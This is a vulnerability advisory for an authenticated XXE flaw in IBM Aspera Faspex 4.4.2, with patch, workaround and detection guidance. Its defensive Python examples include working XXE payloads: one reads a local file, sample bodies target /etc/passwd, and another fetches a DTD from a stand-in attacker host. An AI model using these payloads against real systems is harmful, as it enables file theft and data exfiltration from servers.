CVE-2023-27874

9.9 CRITICAL

📋 TL;DR

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) flaw: XML supplied by a logged-in user is parsed with external entity resolution enabled, so a remote attacker holding any Faspex account can read arbitrary files on the server and potentially execute commands on it. This affects every organization running Faspex 4.4.2 for high-speed file transfer. Authentication is required, but a 9.9 is as high as CVSS 3 goes for a flaw that needs a login: it corresponds to low-privilege network access with no user interaction, full loss of confidentiality, integrity and availability, and impact that reaches beyond the application itself.

💻 Affected Systems

Products:
  • IBM Aspera Faspex
Versions: 4.4.2
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires a valid Faspex login; any account suffices. Every 4.4.2 deployment that has not applied the fix level named below is vulnerable regardless of configuration.

📦 What is this software?

IBM Aspera Faspex is a web application for exchanging file packages between users, workgroups and external partners over Aspera's FASP high-speed transfer protocol. Because its job is moving large files to and from outside parties, it is commonly deployed at the network edge with accounts issued to external users, which is why an authenticated-only flaw still matters here.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A remote authenticated attacker reads sensitive files, executes arbitrary commands on the Faspex host, takes full control of the system, and pivots to other systems on the network.

🟠 Likely Case

The attacker reads configuration files, extracts the credentials stored in them, and uses those for a foothold and further exploitation.

🟢 If Mitigated

With Faspex reachable only from trusted networks and accounts restricted to known users, impact is confined to the file transfer system and the data it holds.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: No
Complexity: LOW

No public proof of concept is known, but XXE is a well-understood bug class with low exploitation complexity, so weaponization should be assumed. Authentication is required, yet Faspex deployments routinely hold accounts for external partners and contractors, so the requirement reduces immediate risk without eliminating it.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.2 Patch Level 1 or later

Vendor Advisory: https://www.ibm.com/support/pages/node/6964694

Restart Required: Yes

Instructions:

1. Download the patch from IBM Fix Central.
2. Back up the current installation.
3. Apply the patch following IBM's instructions.
4. Restart the Aspera Faspex services.
5. Confirm in the admin interface that the version reads 4.4.2 Patch Level 1 or later.

🔧 Temporary Workarounds

Disable XML external entity processing (applies to: all platforms)

Configure the XML parser so it never resolves external entities. On Java (JAXP/Xerces) parsers this means setting FEATURE_SECURE_PROCESSING=true and the disallow-doctype-decl feature to true; rejecting the DOCTYPE outright is the stronger of the two, because a document that cannot declare entities cannot reference external ones. Caveat: both names are Java parser features, and no supported Faspex setting that exposes them is documented here, so treat this as guidance for your own XML-handling code and integrations rather than a substitute for the vendor fix.

Network segmentation (applies to: all platforms)

Restrict access to Aspera Faspex to trusted networks only: configure firewall rules so inbound connections to the Faspex web interface are accepted only from specific IP ranges. This does not stop an attacker who already holds an account inside the allowed ranges.
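To make the parser workaround concrete, here is the XXE pattern this advisory describes, reproduced with Python's standard-library SAX parser in two configurations: one that resolves external general entities (what an unhardened parser does) and one that rejects any DOCTYPE, the stdlib counterpart of the disallow-doctype-decl and secure-processing settings named above. This is an added example and not IBM's or Faspex's code; the page does not show the Faspex payload or parser, so the `<package>` document and the temporary "credential" file are constructed for the demo.

```python
"""XXE reproduced with Python's stdlib SAX parser, in unsafe and hardened configurations.

Added example, not IBM or Faspex code. The page does not show the Faspex payload or
parser, so the <package> document and the temporary "credential" file are made up.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


def make_secret_file() -> str:
    """Throwaway file standing in for a server-side credential file (constructed)."""
    fd, path = tempfile.mkstemp(prefix="faspex-demo-", suffix=".yml")
    with os.fdopen(fd, "w") as f:
        f.write("db_password: hunter2\n")
    return path


def xxe_payload(target_path: str) -> str:
    """Classic XXE: declare an external general entity pointing at a local file,
    then reference it where the application expects ordinary text."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE package [<!ENTITY xxe SYSTEM "{target_path}">]>\n'
        "<package><title>&xxe;</title></package>\n"
    )


class TextCollector(ContentHandler):
    """Collects character data so we can see what the parser substituted for &xxe;."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class RejectDoctype:
    """SAX lexical handler whose startDTD aborts the parse: the stdlib equivalent of
    the disallow-doctype-decl feature. No DOCTYPE means no entity declarations."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE declarations are not accepted")

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def _run(parser, xml_text: str) -> str:
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode()))
    return "".join(collector.parts)


def parse_vulnerable(xml_text: str) -> str:
    """Unsafe configuration: the parser resolves external general entities.
    Python 3.7.1+ disables this by default, so it is switched on explicitly
    to show what an unhardened parser does."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    return _run(parser, xml_text)


def parse_hardened(xml_text: str) -> str:
    """Hardened configuration: external entities off and any DOCTYPE rejected,
    which is what FEATURE_SECURE_PROCESSING plus disallow-doctype-decl give you
    on a Java parser."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDoctype())
    return _run(parser, xml_text)


def demo() -> dict:
    """Feed the same payload to both parsers and report what happened."""
    secret = make_secret_file()
    try:
        payload = xxe_payload(secret)
        leaked = parse_vulnerable(payload)           # file contents come back as text
        try:
            parse_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True                           # parse aborted at the DOCTYPE
        return {"leaked_secret": "hunter2" in leaked, "hardened_blocked": blocked}
    finally:
        os.unlink(secret)


if __name__ == "__main__":
    print(demo())
```

Run it as a script: the vulnerable parser returns the temp file's contents inside the `<title>` text, while the hardened parser never gets past the DOCTYPE. Turning external entities off alone is the minimum; rejecting the DOCTYPE also removes parameter-entity and entity-expansion tricks that an entity-resolution flag does not cover.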

🧯 If You Can't Patch

  • Shrink the pool of accounts that can reach the parser: remove dormant and unneeded external (partner) accounts, disable self-registration if the deployment allows it, and alert on logins from unexpected locations or outside normal hours
  • Put a web application firewall with XXE rules (DOCTYPE and ENTITY declarations in request bodies) in front of Faspex; such rules are bypassable through encoding tricks, so treat this as a stopgap rather than a fix

🔍 How to Verify

Check if Vulnerable:

Any IBM Aspera Faspex 4.4.2 deployment that reports a level below 4.4.2 Patch Level 1 is vulnerable, regardless of configuration.

Check Version:

Read the version and patch level from the Faspex admin web interface; the installed package's configuration files on the server carry the same information if the interface is unavailable.

Verify Fix Applied:

After patching and restarting the Faspex services, confirm the admin interface reports 4.4.2 Patch Level 1 or later.

📡 Detection & Monitoring

Log Indicators:

  • XML uploads or API requests whose bodies carry a DOCTYPE or ENTITY declaration; a DOCTYPE in client-supplied XML is rarely legitimate
  • Repeated authentication attempts against one account or from one source, which may precede use of a compromised login
  • The Faspex web process reading files it has no reason to touch (system account databases, application credential files)

Network Indicators:

  • XML payloads with external entity references (SYSTEM or PUBLIC identifiers, parameter entities)
  • Outbound HTTP, FTP or DNS from the Faspex host to unexpected destinations, the signature of out-of-band XXE that fetches a remote DTD or exfiltrates file contents

SIEM Query:

source="aspera" AND (xml OR xxe OR entity) AND (error OR exception OR failed)

This query only surfaces parse failures, so it catches clumsy attempts and misses a payload the parser accepted; pair it with the request-body indicators above.
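As an added example (not an IBM or Faspex detection rule), the following Python screens logged request bodies for the indicators listed above and distinguishes local-file reads from out-of-band fetches, which is the distinction that tells you whether to go looking for exfiltration in outbound traffic as well. The log format, user names, request paths and sample bodies are all constructed for the demo.

```python
"""Flag XXE indicators in logged request bodies.

Added example for the indicators listed above; it is not an IBM or Faspex detection
rule. The log format, field names and sample lines are constructed for the demo.
"""
import re
from dataclasses import dataclass
from urllib.parse import quote, unquote_plus

# External entity declaration: <!ENTITY [%] name SYSTEM "uri"> or PUBLIC "id" "uri".
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?P<uri>\"[^\"]*\"|'[^']*')",
    re.I,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
XINCLUDE_RE = re.compile(r"<xi:include\b[^>]*\bhref\s*=\s*(?:\"([^\"]*)\"|'([^']*)')", re.I)
REMOTE_SCHEMES = {"http", "https", "ftp", "gopher"}


def scheme_of(uri: str) -> str:
    """Return the URI scheme, or 'path' for bare file paths (a one-letter 'scheme' is a drive)."""
    m = re.match(r"([a-z][a-z0-9+.-]*):", uri, re.I)
    if not m or len(m.group(1)) == 1:
        return "path"
    return m.group(1).lower()


def analyze(body: str) -> tuple[str, list[str]]:
    """Classify one decoded XML body: returns (severity, reasons)."""
    reasons, severity = [], "none"
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri")[1:-1]
        kind = "parameter" if m.group("param") else "general"
        if scheme_of(uri) in REMOTE_SCHEMES:
            reasons.append(f"{kind} entity {m.group('name')} fetches {uri}: out-of-band XXE / exfiltration")
        else:
            reasons.append(f"{kind} entity {m.group('name')} reads local resource {uri}")
        severity = "high"
    for m in XINCLUDE_RE.finditer(body):
        reasons.append(f"XInclude pulls in {m.group(1) or m.group(2)}")
        severity = "high"
    if severity == "none" and DOCTYPE_RE.search(body):
        reasons.append("DOCTYPE without external entities; rare in application traffic, review")
        severity = "medium"
    return severity, reasons


@dataclass
class Finding:
    line_no: int
    user: str
    severity: str
    reasons: list


def scan_log(lines) -> list[Finding]:
    """Walk 'key=value' log lines; bodies are URL-encoded in this constructed format."""
    findings = []
    for n, line in enumerate(lines, 1):
        body = re.search(r"\bbody=(\S+)", line)
        if not body:
            continue
        user = re.search(r"\buser=(\S+)", line)
        severity, reasons = analyze(unquote_plus(body.group(1)))
        if severity != "none":
            findings.append(Finding(n, user.group(1) if user else "?", severity, reasons))
    return findings


# Constructed sample bodies (the real Faspex package format is not shown on the page).
BENIGN = '<?xml version="1.0"?><package xmlns="http://example.invalid/ns"><title>Q3 report</title></package>'
FILE_XXE = '<?xml version="1.0"?><!DOCTYPE p [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><p><t>&xxe;</t></p>'
OOB_XXE = '<?xml version="1.0"?><!DOCTYPE p [<!ENTITY % dtd SYSTEM "http://attacker.invalid/x.dtd"> %dtd;]><p/>'
XINCLUDE = '<p xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="/etc/hostname" parse="text"/></p>'
INTERNAL_DTD = '<!DOCTYPE p [<!ENTITY a "aaaa">]><p>&a;</p>'

# Constructed log lines; user names and the /example/... paths are placeholders.
SAMPLE_LOG = [
    f"2023-03-01T10:00:01Z user=alice method=POST path=/example/upload body={quote(BENIGN)}",
    f"2023-03-01T10:00:02Z user=partner07 method=POST path=/example/upload body={quote(FILE_XXE)}",
    f"2023-03-01T10:00:03Z user=partner07 method=POST path=/example/upload body={quote(OOB_XXE)}",
    f"2023-03-01T10:00:04Z user=partner07 method=POST path=/example/upload body={quote(XINCLUDE)}",
    f"2023-03-01T10:00:05Z user=bob method=POST path=/example/upload body={quote(INTERNAL_DTD)}",
    "2023-03-01T10:00:06Z user=alice method=GET path=/example/packages",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} user={f.user} {f.severity}: {'; '.join(f.reasons)}")
```

The benign body carries an `http://` namespace URI and trips nothing, because only URIs inside entity declarations and XInclude hrefs are inspected; that keeps the rule quieter than a bare keyword match on "entity" or "xml". A remote-scheme hit on an authenticated account is the case to escalate fastest, since it means the payload is designed to pull a DTD from, or push data to, a host the attacker controls.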
